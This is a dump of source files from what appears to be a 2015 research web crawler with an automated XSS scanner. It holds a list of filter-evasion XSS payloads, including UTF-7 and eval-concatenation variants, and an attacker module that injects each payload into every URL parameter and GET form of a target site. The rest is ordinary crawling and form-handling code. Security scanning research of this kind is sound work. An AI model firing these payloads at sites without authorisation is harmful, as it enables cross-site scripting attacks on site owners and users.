97 |
98 |
99 |
100 |
101 |
102 | a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"jsb.attack(XSS);\\\")\";\neval(a+b+c+d);
103 | cript:jsb.attack(XSS)\">\n
104 | \n
105 | \n\n\n jsb.attack(\"XSS\")\">\n
106 |
107 |
108 | echo('jsb.attack(\"XSS\")'); ?>
109 | jsb.attack(XSS)\">
110 | +ADw-SCRIPT+AD4-jsb.attack(XSS);+ADw-/SCRIPT+AD4-
111 | ;!--\'=&{()}\\xss
112 | ">
113 | <
114 | """"
115 | \\";jsb.attack(\'XSS\');//
116 |
--------------------------------------------------------------------------------
/crawler/attack/xxxattacks.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import logging
19 | import os
20 | import random
21 | import string
22 |
23 |
24 | __author__ = 'constantin'
25 |
26 |
27 | FILENAME = "/xssvectors.txt"
28 | class XSSVectors():
29 |
30 | def __init__(self):
31 | self.attack_vectors = []
32 | for line in open(os.path.dirname(os.path.realpath(__file__)) + FILENAME, "r"):
33 | self.attack_vectors.append(line[:-1])
34 |
35 | def random_string_generator(self, size=6, chars=string.ascii_uppercase + string.digits+string.ascii_lowercase):
36 | result = ""
37 | for i in range(size):
38 | result += random.choice(chars)
39 | return result
40 |
41 | def random_number_generator(self, size=6):
42 | i = 1
43 | max_num = ""
44 | min_num = "1"
45 | for i in range(size + 1):
46 | max_num += "9"
47 | min_num += "0"
48 | min_num = min_num[:-1]
49 | max_num = int(max_num)
50 | min_num = int(min_num)
51 | return str(random.randint(min_num, max_num))
52 |
--------------------------------------------------------------------------------
/crawler/attacker.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from asyncio.tasks import sleep
19 | import logging
20 | import sys
21 | from urllib.parse import urlparse
22 |
23 |
24 | from attack.xss import XSSAttacker, AttackResult
25 | from attack.xxxattacks import XSSVectors
26 | from core.jaekcore import JaekCore
27 | from models.url import Url
28 | from models.utils import CrawlSpeed
29 | from utils.domainhandler import DomainHandler
30 | from utils.execptions import LoginFailed
31 |
32 |
33 |
34 | __author__ = 'constantin'
35 |
36 | EMPTY_LIMIT = 5
37 | class Attacker(JaekCore):
38 | def __init__(self, config, proxy="", port=0, database_manager=None):
39 | super(Attacker, self).__init__(config, proxy="", port=0, database_manager=database_manager)
40 |
41 | self._xss = XSSAttacker(self, proxy, port, crawl_speed=CrawlSpeed.Medium,
42 | network_access_manager=self._network_access_manager)
43 |
44 | self._xss_vector = XSSVectors()
45 |
46 | def attack(self, user):
47 | self.domain_handler = DomainHandler(self.config.start_page_url, self.database_manager, cluster_manager=None)
48 | self.user = user
49 | if user.login_data is not None:
50 | self.process_with_login = True
51 | go_on = self._initial_login()
52 | if not go_on:
53 | raise LoginFailed("Initial login failed...")
54 | self.attack_all_urls_with_replacing()
55 | self.attack_all_urls_with_additions()
56 | self.attack_all_get_forms()
57 | #url = "http://localhost:8080/index.php/apps/files/ajax/download.php?files=moep&dir=tut"
58 | #url = "http://localhost:8080/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=t47sx79npgz01tywyeo3wwuuxz03u7vh"
59 | #url = "http://localhost:8080/admin.php?page=plugin-AdminTool%3Cimg%20onerror%3Dalert(123)%3B%20src%3Dx%3Es"
60 | #url = "http://localhost:8080/report.php?type=post&pid=1"
61 | #self.attack_single_url(url, replacement= True)
62 |
63 |
64 | def attack_single_url(self, url, replacement=False):
65 | if not replacement:
66 | attack_url = url
67 | result, response_code = self._xss.attack(attack_url, "123")
68 | logging.debug("Result: {}".format(result))
69 | return
70 | url = Url(url)
71 | for parameter_to_attack in url.parameters:
72 | for vector in self._xss_vector.attack_vectors:
73 | attack_url = url.scheme + "://" + url.domain + url.path + "?"
74 | random_val = self._xss_vector.random_number_generator(12)
75 | ramdom_val = "123"
76 | for other_parameters in url.parameters:
77 | if parameter_to_attack == other_parameters:
78 | attack_url += other_parameters + "=" + vector.replace("XSS", random_val) + "&"
79 | else:
80 | attack_url += other_parameters + "=" + url.parameters[other_parameters][0] + "&"
81 | attack_url = attack_url[:-1] # Removing the last "&
82 | logging.debug("Attack with: {}".format(attack_url))
83 | result, response_code = self._xss.attack(attack_url, random_val)
84 | logging.debug("Result: {}".format(result))
85 |
86 |
87 | def attack_all_urls_with_additions(self):
88 | domain = urlparse(self.config.start_page_url)
89 | domain = domain.netloc
90 | all_urls = self.database_manager.get_all_urls_to_domain(domain)
91 | for url in all_urls:
92 | if len(url.parameters) > 0:
93 | logging.debug("Now testing with url: {}".format(url.toString()))
94 | if self.process_with_login:
95 | self._handle_possible_logout()
96 | for parameter_to_attack in url.parameters:
97 | empty_counter = 0
98 | for vector in self._xss_vector.attack_vectors:
99 | attack_url = url.scheme + "://" + url.domain + url.path + "?"
100 | random_val = self._xss_vector.random_number_generator(12)
101 | for other_parameters in url.parameters:
102 | if parameter_to_attack == other_parameters:
103 | attack_url += other_parameters + "=" + str(url.parameters[other_parameters][0]) if url.parameters[other_parameters][0] is not None else ""
104 | attack_url += vector.replace("XSS", str(random_val)) + "&"
105 | else:
106 | attack_url += other_parameters + "="
107 | attack_url += url.parameters[other_parameters][0] if url.parameters[other_parameters][0] is not None else ""
108 | attack_url += "&"
109 | attack_url = attack_url[:-1] # Removing the last "&
110 | logging.debug("Attack with: {}".format(attack_url))
111 | result, response_code = self._xss.attack(attack_url, random_val)
112 | if not self._check_login_status_with_cookies():
113 | sleep(2000)
114 | self._initial_login()
115 | result, response_code = self._xss.attack(attack_url, random_val)
116 | if response_code is None:
117 | continue
118 | if response_code >= 400 or result == AttackResult.JSON:
119 | empty_counter = 42
120 | logging.debug("Result: {} - Response Code: {}" .format(result, response_code))
121 | if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed):
122 | self.database_manager.insert_attack_result(result, attack_url)
123 | empty_counter = 0
124 | else:
125 | empty_counter += 1
126 | if empty_counter > EMPTY_LIMIT:
127 | break
128 |
129 |
130 |
131 | def attack_all_urls_with_replacing(self):
132 | all_urls = self.database_manager.get_one_visited_url_per_structure()
133 | for url in all_urls:
134 | if len(url.parameters) > 0:
135 | logging.debug("Now testing with url: {}".format(url.toString()))
136 | if self.process_with_login:
137 | self._handle_possible_logout()
138 | for parameter_to_attack in url.parameters:
139 | empty_counter = 0
140 | for vector in self._xss_vector.attack_vectors:
141 | attack_url = url.scheme + "://" + url.domain + url.path + "?"
142 | random_val = self._xss_vector.random_number_generator(12)
143 | for other_parameters in url.parameters:
144 | if parameter_to_attack == other_parameters:
145 | attack_url += other_parameters + "=" + vector.replace("XSS", random_val) + "&"
146 | else:
147 | attack_url += other_parameters + "="
148 | attack_url += url.parameters[other_parameters][0] if url.parameters[other_parameters][0] is not None else ""
149 | attack_url += "&"
150 | attack_url = attack_url[:-1] # Removing the last "&
151 | logging.debug("Attack with: {}".format(attack_url))
152 | result, response_code = self._xss.attack(attack_url, random_val)
153 | if not self._check_login_status_with_cookies():
154 | sleep(2000)
155 | self._initial_login()
156 | result, response_code = self._xss.attack(attack_url, random_val)
157 | if response_code is None:
158 | continue
159 | if response_code >= 400 or result == AttackResult.JSON:
160 | empty_counter = 42
161 | logging.debug("Result: {} - Response Code: {}" .format(result, response_code))
162 | if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed):
163 | self.database_manager.insert_attack_result(result, attack_url)
164 | empty_counter = 0
165 | else:
166 | empty_counter += 1
167 | if empty_counter > EMPTY_LIMIT:
168 | break
169 |
170 | def attack_all_get_forms(self):
171 | if self.process_with_login:
172 | self._handle_possible_logout()
173 | logging.debug("Attacking with get forms")
174 | all_forms = self.database_manager.get_one_form_per_destination()
175 | for form in all_forms:
176 | logging.debug(form.toString())
177 | if "javascript" in form.action.complete_url:
178 | continue
179 | for param_to_attack in form.parameter:
180 | if param_to_attack.input_type == "submit" or param_to_attack.name is None:
181 | continue
182 | logging.debug("Now at paramerter {}".format(param_to_attack.toString()))
183 | empty_counter = 0
184 | for vector in self._xss_vector.attack_vectors:
185 | attack_url = form.action.complete_url + "?"
186 | random_val = self._xss_vector.random_number_generator(12)
187 | for other_parameter in form.parameter:
188 | if param_to_attack == other_parameter:
189 | if other_parameter is None or other_parameter.name is None:
190 | continue
191 | attack_url += other_parameter.name + "=" + vector.replace("XSS", random_val) + "&"
192 | else:
193 | if other_parameter.input_type == "submit" or other_parameter.name is None:
194 | continue
195 | elif other_parameter.values is None:
196 | attack_url += other_parameter.name + "=&"
197 | elif other_parameter.values[0] is not None:
198 | attack_url += other_parameter.name + "=" + other_parameter.values[0] + "&"
199 | else:
200 | attack_url += other_parameter.name + "=" + self._xss_vector.random_string_generator(6) + "&"
201 | attack_url = attack_url[:-1]
202 | logging.debug("Attack with: {}".format(attack_url))
203 | result, response_code = self._xss.attack(attack_url, random_val)
204 | if not self._check_login_status_with_cookies():
205 | sleep(2000)
206 | self._initial_login()
207 | result, response_code = self._xss.attack(attack_url, random_val)
208 | if response_code is None:
209 | continue
210 | if response_code >= 400 or result == AttackResult.JSON:
211 | empty_counter = 42
212 | logging.debug("Result: {} - Response Code: {}" .format(result, response_code))
213 | if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed):
214 | self.database_manager.insert_attack_result(result, attack_url)
215 | empty_counter = 0
216 | else:
217 | empty_counter += 1
218 | if empty_counter > EMPTY_LIMIT:
219 | break
220 |
221 |
222 |
223 |
224 |
225 |
--------------------------------------------------------------------------------
/crawler/core/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
--------------------------------------------------------------------------------
/crawler/core/clustermanager.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import itertools
19 | import logging
20 | from copy import deepcopy
21 | from models.url import Url
22 | from utils.utils import calculate_similarity_between_pages
23 |
24 |
25 | __author__ = 'constantin'
26 |
27 | CLUSTER_THRESHOLD = .2
28 |
29 | class ClusterManager():
30 | """
31 | A cluster is a collection of similar pages, defined through a cluster function
32 | """
33 |
34 | def __init__(self, persistence_manager):
35 | self._persistence_manager = persistence_manager
36 | self._similarity_cache = {} #Stores in a tripple: List(ids), result
37 |
38 | @property
39 | def get_clusters(self):
40 | return self._clusters
41 |
42 | def get_cluster(self, url_description):
43 | try:
44 | return self._clusters[url_description].values()
45 | except:
46 | raise KeyError("No cluster with that id found")
47 |
48 | def add_webpage_to_cluster(self, webpage):
49 | url = Url(webpage.url)
50 | clusters = self._persistence_manager.get_clusters(url.url_hash)
51 | if clusters is None:
52 | #self._clusters[url.url_hash] = [webpage.id]
53 | self._persistence_manager.write_clusters(url.url_hash, [webpage.id])
54 | else:
55 | tmp = []
56 | for c in clusters:
57 | if isinstance(c, list):
58 | tmp.extend(c)
59 | else:
60 | tmp.append(c)
61 | tmp.append(webpage.id)
62 | new_clusters = self.hierarchical_clustering(tmp, CLUSTER_THRESHOLD)
63 | for c in new_clusters:
64 | if isinstance(c, int): # Konvert integer to list, so mongo store all seperate single clusters in its own lists.
65 | new_clusters.remove(c)
66 | new_clusters.insert(0, [c])
67 | self._persistence_manager.write_clusters(url.url_hash, new_clusters)
68 |
69 |
70 | def hierarchical_clustering(self, clusters, threshold):
71 | result = []
72 | rest_clusters = clusters
73 | while len(rest_clusters) > 1:
74 | combinations_of_clusters = list(itertools.combinations(rest_clusters, 2))
75 | distances = []
76 | for combi in combinations_of_clusters:
77 | distance = self.calculate_minimum_distance(combi[0], combi[1])
78 | distances.append((distance, combi[0], combi[1]))
79 | #distances = sorted(distances, key=lambda x: x[0])
80 | min_distance = min(distances, key=lambda x: x[0])
81 | if min_distance[0] > threshold:
82 | break
83 | else:
84 | rest_clusters.remove(min_distance[1])
85 | rest_clusters.remove(min_distance[2])
86 | if isinstance(min_distance[1], int):
87 | a = min_distance[1],
88 | else:
89 | a = min_distance[1]
90 | if isinstance(min_distance[2], int):
91 | b = min_distance[2],
92 | else:
93 | b = min_distance[2]
94 | new_cluster = a + b
95 | rest_clusters.append(new_cluster)
96 | return rest_clusters
97 |
98 | def calculate_minimum_distance(self, cluster1, cluster2):
99 | if isinstance(cluster1, int):
100 | cluster1 = [cluster1]
101 | else:
102 | cluster1 = list(cluster1)
103 | if isinstance(cluster2, int):
104 | cluster2 = [cluster2]
105 | else:
106 | cluster2 = list(cluster2)
107 | all_nodes = cluster1 + cluster2
108 | all_combinations = list(itertools.combinations(all_nodes, 2))
109 | distances = []
110 | for combi in all_combinations:
111 | if combi[0] in cluster1 and combi[1] in cluster1 or combi[0] in cluster2 and combi[1] in cluster2:
112 | continue
113 | distance = self.calculate_distance(combi[0], combi[1])
114 | distances.append((combi[0], combi[1], distance))
115 | min_distance = min(distances, key=lambda x: x[2])
116 | return min_distance[2]
117 |
118 | def calculate_distance(self, x, y):
119 | name = self.get_similarity_identifier(x, y)
120 | if name in self._similarity_cache:
121 | result = self._similarity_cache[name]
122 | else:
123 | page_x = self._persistence_manager.get_web_page_to_id(x)
124 | page_y = self._persistence_manager.get_web_page_to_id(y)
125 | result = calculate_similarity_between_pages(page_x, page_y, verbose=True)
126 | self._similarity_cache[name] = result
127 | return 1 - result
128 |
129 | def get_similarity_identifier(self, x, y):
130 | name = (x, y)
131 | name = sorted(name)
132 | return str(name[0])+"$"+str(name[1])
133 |
134 | def calculate_cluster_per_visited_urls(self, url_hash):
135 | try:
136 | return self.num_of_clusters(url_hash) / self.num_of_visited_urls(url_hash)
137 | except ZeroDivisionError:
138 | return 1.0
139 |
140 | def num_of_clusters(self, url_hash):
141 | clusters = self._persistence_manager.get_clusters(url_hash)
142 | if clusters is not None:
143 | return len(clusters)
144 | return 1.0
145 |
146 | def num_of_visited_urls(self, url_hash):
147 | return self._persistence_manager.count_visited_url_per_hash(url_hash)
148 |
149 | def need_more_urls_of_this_type(self, url_hash):
150 | """
151 | :param url_hash:
152 | :return: if we have seen enough of an url or not
153 | """
154 | return self.calculate_cluster_per_visited_urls(url_hash) > CLUSTER_THRESHOLD
155 |
156 |
157 |
158 |
159 |
160 |
161 |
--------------------------------------------------------------------------------
/crawler/core/eventexecutor.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import logging
19 | import random
20 | import string
21 | from enum import Enum
22 |
23 | from PyQt5.Qt import QUrl
24 | from PyQt5.QtWebKitWidgets import QWebPage
25 | from analyzer.helper.formhelper import extract_forms
26 | from analyzer.helper.linkhelper import extract_links
27 |
28 | from analyzer.helper.propertyhelper import property_helper
29 | from models.ajaxrequest import AjaxRequest
30 | from models.deltapage import DeltaPage
31 | from models.enumerations import XHRBehavior
32 | from models.keyclickable import KeyClickable
33 | from core.interactioncore import InteractionCore
34 | from models.utils import CrawlSpeed, purge_dublicates
35 |
36 |
37 | class EventExecutor(InteractionCore):
38 |
39 | def __init__(self, parent, proxy="", port=0, crawl_speed=CrawlSpeed.Medium, network_access_manager=None):
40 | super(EventExecutor, self).__init__(parent, proxy, port, crawl_speed, network_access_manager)
41 | self._url_changed = False # Inidicates if a event changes a location => treat it as link!
42 | self._new_url = None
43 | self.timeming_events = None
44 | self.none_key_events = ['click', 'focus', 'blur', 'dblclick', 'input', 'change',
45 | 'mousedown', 'mousemove', 'mouseout', 'mouseover', 'mouseup',
46 | 'resize', 'scroll', 'select', 'submit', 'load', 'unload', 'mouseleave']
47 | self.key_events = ['keyup', 'keydown', 'keypress']
48 | self.supported_events = self.none_key_events + self.key_events
49 |
50 | self.seen_timeouts = {}
51 | self.popup = None # reference if a popup occurs...
52 | self.mainFrame().urlChanged.connect(self._url_changes)
53 |
54 | def execute(self, webpage, timeout=5, element_to_click=None, xhr_options=XHRBehavior.ObserveXHR, pre_clicks=[]):
55 | logging.debug(
56 | "EventExecutor test started on {}...".format(webpage.url) + " with " + element_to_click.toString())
57 | self._analyzing_finished = False
58 | self._loading_complete = False
59 | self.xhr_options = xhr_options
60 | self.element_to_click = None
61 | self.ajax_requests = []
62 | self._new_url = None
63 | self.timeming_events = None
64 | self._capturing_ajax = False
65 | self._new_clickables = []
66 | self.element_to_click = element_to_click
67 | self.popup = None
68 | self.mainFrame().setHtml(webpage.html, QUrl(webpage.url))
69 | target_tag = element_to_click.dom_address.split("/")
70 | target_tag = target_tag[-1]
71 | if target_tag in ['video']:
72 | return EventResult.UnsupportedTag, None
73 |
74 | t = 0.0
75 | while (not self._loading_complete and t < timeout ): # Waiting for finish processing
76 | self._wait(0.1)
77 | t += 0.1
78 | if not self._loading_complete:
79 | logging.debug("Timeout occurs while initial page loading...")
80 | return EventResult.ErrorWhileInitialLoading, None
81 | # Prepare Page for clicking...
82 | self._wait(0.1)
83 | for click in pre_clicks:
84 | pre_click_elem = None
85 | logging.debug("Click on: " + click.toString())
86 | if click.id != None and click.id != "":
87 | pre_click_elem = self.search_element_with_id(click.id)
88 | if click.html_class != None and pre_click_elem == None:
89 | pre_click_elem = self.search_element_with_class(click.html_class, click.dom_address)
90 | if pre_click_elem == None:
91 | pre_click_elem = self.search_element_without_id_and_class(click.dom_address)
92 |
93 | if pre_click_elem is None:
94 | logging.debug("Preclicking element not found")
95 | return EventResult.PreviousClickNotFound, None
96 |
97 | if "javascript:" not in click.event:
98 | js_code = click.event
99 | if js_code[0:2] == "on":
100 | js_code = js_code[2:] # if event beginns with on, escape it
101 | js_code = "Simulate." + js_code + "(this);"
102 | pre_click_elem.evaluateJavaScript(js_code) # Waiting for finish processing
103 | else:
104 | pre_click_elem.evaluateJavaScript(click.event[len("javascript:"):])
105 | self._wait(self.wait_for_event)
106 |
107 | is_key_event = False
108 | # Now execute the target event
109 | if "javascript:" not in element_to_click.event:
110 | self._url_changed = False
111 | js_code = element_to_click.event
112 | if js_code[0:2] == "on":
113 | js_code = js_code[2:] # if event begins with on, escape it
114 |
115 | if js_code in self.key_events:
116 | is_key_event = True
117 | random_char = random.choice(string.ascii_letters)
118 | js_code = "Simulate." + js_code + "(this, '" + random_char + "');"
119 | else:
120 | js_code = "Simulate." + js_code + "(this);"
121 | else:
122 | js_code = element_to_click.event[len("javascript:"):]
123 |
124 | self.mainFrame().evaluateJavaScript(
125 | self._addEventListener) # This time it is here, because I dont want to have the initial addings
126 |
127 | real_clickable = None
128 | if element_to_click.id != None and element_to_click.id != "":
129 | real_clickable = self.search_element_with_id(element_to_click.id)
130 | if element_to_click.html_class != None and real_clickable == None:
131 | real_clickable = self.search_element_with_class(element_to_click.html_class, element_to_click.dom_address)
132 | if real_clickable == None:
133 | real_clickable = self.search_element_without_id_and_class(element_to_click.dom_address)
134 |
135 | if real_clickable is None:
136 | logging.debug("Target Clickable not found")
137 | return EventResult.TargetElementNotFound, None
138 |
139 | self._capturing_ajax = True
140 | real_clickable.evaluateJavaScript(js_code)
141 | self._wait(0.5)
142 | self._capturing_ajax = False
143 | links, clickables = extract_links(self.mainFrame(), webpage.url)
144 |
145 | forms = extract_forms(self.mainFrame())
146 | elements_with_event_properties = property_helper(self.mainFrame())
147 | self.mainFrame().evaluateJavaScript(self._property_obs_js)
148 | self._wait(0.1)
149 |
150 | html = self.mainFrame().toHtml()
151 | url = self.mainFrame().url().toString()
152 |
153 | if is_key_event:
154 | generator = KeyClickable(element_to_click, random_char)
155 | else:
156 | generator = element_to_click
157 | if self._url_changed and self._new_url.toString() != webpage.url:
158 | delta_page = DeltaPage(-1, self._new_url.toString(), html=None, generator=generator, parent_id=webpage.id,
159 | cookiesjar=webpage.cookiejar)
160 | self._analyzing_finished = True
161 | self.mainFrame().setHtml(None)
162 | return EventResult.URLChanged, delta_page
163 | elif self.popup is not None:
164 | logging.debug("Event creates Popup with Url: {}".format(self.popup.mainFrame().url().toString()))
165 | popup_url = self.popup.mainFrame().url().toString()
166 | delta_page = DeltaPage(-1, popup_url, html=None, generator=generator, parent_id=webpage.id)
167 | self.popup = None
168 | self._analyzing_finished = True
169 | self.mainFrame().setHtml(None)
170 | return EventResult.CreatesPopup, delta_page
171 | else:
172 | delta_page = DeltaPage(-1, webpage.url, html, generator=generator, parent_id=webpage.id,
173 | cookiesjar=webpage.cookiejar)
174 | delta_page.clickables = self._new_clickables # Set by add eventlistener code
175 | delta_page.clickables.extend(clickables)
176 | delta_page.clickables.extend(elements_with_event_properties)
177 | delta_page.clickables = purge_dublicates(delta_page.clickables)
178 | try:
179 | delta_page.clickables.remove(self.element_to_click) # remove the clickable self...
180 | except ValueError:
181 | pass
182 | delta_page.links = links
183 | delta_page.forms = forms
184 | delta_page.ajax_requests = self.ajax_requests
185 | self._analyzing_finished = True
186 | self.mainFrame().setHtml(None)
187 | return EventResult.Ok, delta_page
188 |
189 | def javaScriptAlert(self, frame, msg):
190 | logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))
191 |
192 | def javaScriptConfirm(self, frame, msg):
193 | logging.debug("Confirm occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))
194 | return True
195 |
196 | def loadFinishedHandler(self, result):
197 | if not self._analyzing_finished: # Just to ignoring setting of non page....
198 | self._loading_complete = True
199 |
200 | def jsWinObjClearedHandler(self): # Adding here the js-scripts corresponding to the phases
201 | if not self._analyzing_finished:
202 | self.mainFrame().evaluateJavaScript(self._lib_js)
203 | self.mainFrame().evaluateJavaScript(self._md5)
204 | self.mainFrame().addToJavaScriptWindowObject("jswrapper", self._js_bridge)
205 | if self.xhr_options == XHRBehavior.ObserveXHR:
206 | self.mainFrame().evaluateJavaScript(self._xhr_observe_js)
207 | if self.xhr_options == XHRBehavior.InterceptXHR:
208 | self.mainFrame().evaluateJavaScript(self._xhr_interception_js)
209 |
210 | def createWindow(self, win_type):
211 | logging.debug("Creating new window...{}".format(win_type))
212 |
213 | def capturing_requests(self, request):
214 | if self._capturing_ajax:
215 | logging.debug("Ajax to: {} captured...".format(request['url']))
216 | ajax_request = AjaxRequest(request['method'], request['url'], self.element_to_click, request['parameters'])
217 | if ajax_request not in self.ajax_requests:
218 | self.ajax_requests.append(ajax_request)
219 |
220 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
221 | logging.debug("Console(EventExecutor): " + message + " at: " + str(lineNumber))
222 | pass
223 |
224 | def capture_timeout_call(self, timingevent):
225 | try:
226 | # logging.debug(timingevent)
227 | if timingevent['time'] != "undefined":
228 | time = timingevent['time'] # millisecond
229 | event_type = timingevent['type']
230 | event_id = timingevent['function_id']
231 | if self.timeming_events is not None:
232 | if time > self.timeming_events[0]:
233 | self.timeming_events = (time, event_type, event_id)
234 | else:
235 | self.timeming_events = (time, event_type, event_id)
236 | except KeyError as err:
237 | logging.debug("Key error occurred in Events " + str(err))
238 |
239 |
240 | def _url_changes(self, url):
241 | self._url_changed = True
242 | self._new_url = url
243 |
244 | def createWindow(self, webWindowType):
245 | self.popup = QWebPage()
246 | return self.popup
247 |
248 |
249 | class EventResult(Enum):
250 | Ok = 0
251 | PreviousClickNotFound = 1
252 | TargetElementNotFound = 2
253 | ErrorWhileInitialLoading = 3
254 | URLChanged = 4
255 | UnsupportedTag = 5
256 | CreatesPopup = 6
257 |
--------------------------------------------------------------------------------
/crawler/core/formhandler.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import logging
19 |
20 | from PyQt5.Qt import QUrl
21 |
22 | from core.interactioncore import InteractionCore
23 | from core.eventexecutor import EventResult
24 | from analyzer.helper.formhelper import extract_forms
25 | from analyzer.helper.linkhelper import extract_links
26 | from models.clickable import Clickable
27 | from models.utils import CrawlSpeed, purge_dublicates
28 |
29 | __author__ = 'constantin'
30 |
31 |
32 | class FormHandler(InteractionCore):
33 |
34 |
35 | def __init__(self, parent, proxy = "", port = 0, crawl_speed = CrawlSpeed.Medium, network_access_manager = None):
36 | super(FormHandler, self).__init__(parent, proxy, port, crawl_speed, network_access_manager)
37 | #self.mainFrame().urlChanged.connect(self._url_changes)
38 |
39 | def submit_form(self, form, webpage, data=dict(), timeout=5):
40 | logging.debug("FormHandler on Page: {} started...".format(webpage.url))
41 | self._loading_complete = False
42 | self._analyzing_finished = False
43 | try:
44 | url = webpage.url.toString()
45 | except AttributeError:
46 | url = webpage.url
47 | self.mainFrame().setHtml(webpage.html, QUrl(url))
48 | self._new_clickables = []
49 |
50 | t = 0.0
51 | while not self._loading_complete and t < timeout: # Waiting for finish processing
52 | self._wait(0.1)
53 | t += 0.1
54 | if not self._loading_complete:
55 | logging.debug("Timeout occurs while initial page loading...")
56 | return EventResult.ErrorWhileInitialLoading, None
57 |
58 | target_form = None
59 | p_forms = self.mainFrame().findAllElements("form")
60 | for tmp_form in p_forms:
61 | path = tmp_form.evaluateJavaScript("getXPath(this)")
62 | if path == form.dom_address:
63 | target_form = tmp_form
64 | break
65 | if target_form is None:
66 | return EventResult.TargetElementNotFound, None
67 |
68 | for elem in form.parameter: #Iterate through abstract form representation
69 | if elem.name in data: #Check if we have the data we must set
70 | elem_found = False # Indicates if we found the element in the html
71 | value_to_set = data[elem.name]
72 | for tmp in target_form.findAll(elem.tag): #Locking in the target form, if we found the element we have to set
73 | if tmp.attribute("name") == elem.name: # Has the current element in the html the same name as our data
74 | tmp.evaluateJavaScript("this.value = '" + value_to_set + "';")
75 | elem_found = True
76 | break
77 | if not elem_found:
78 | return EventResult.TargetElementNotFound, None
79 | # Now we should have set all known parameters, next click the submit button
80 | q_submit_button = None
81 | if "submit" in form.toString():
82 | inputs = target_form.findAll("input") + target_form.findAll("button")
83 | for el in inputs:
84 | if el.attribute("type") == "submit":
85 | q_submit_button = el
86 | break
87 | #q_submit_button.evaluateJavaScript("this.id='oxyfrymbel'")
88 | else:
89 | logging.debug(form.toString())
90 |
91 | if q_submit_button is None:
92 | inputs = target_form.findAll("button")
93 | q_submit_button = None
94 | if len(inputs) > 1:
95 | logging.debug("Cannot locate login button...")
96 | return EventResult.TargetElementNotFound, None
97 | elif len(inputs) == 1:
98 | q_submit_button = inputs[0]
99 |
100 | method = target_form.attribute("onsubmit")
101 | if method is not None and method != "":
102 | js_code_snippets = method.split(";")
103 | for snippet in js_code_snippets:
104 | if "return" in snippet or snippet == "":
105 | logging.debug("Ignoring snippet: {}".format(snippet))
106 | continue
107 | logging.debug("Eval: {}".format(snippet+";"))
108 | self.mainFrame().evaluateJavaScript(snippet+";")
109 | self._wait(3)
110 | self.mainFrame().evaluateJavaScript(self._addEventListener)
111 | self._wait(3)
112 | else:
113 | #TODO: Implement way for sending forms without onsubmit-method
114 | # check between: target_form.evaluateJavaScript("Simulate or document.?form?.submit())
115 | # or submit_button click
116 | if q_submit_button is not None:
117 | logging.debug("Click on submit button...")
118 | q_submit_button.evaluateJavaScript("Simulate.click(this);")
119 | self._wait(3)
120 | else:
121 | logging.debug("Trigger submit event on form...")
122 | target_form.evaluateJavaScript("Simulate.submit(this);")
123 | self._wait(3)
124 |
125 | links, clickables = extract_links(self.mainFrame(), url)
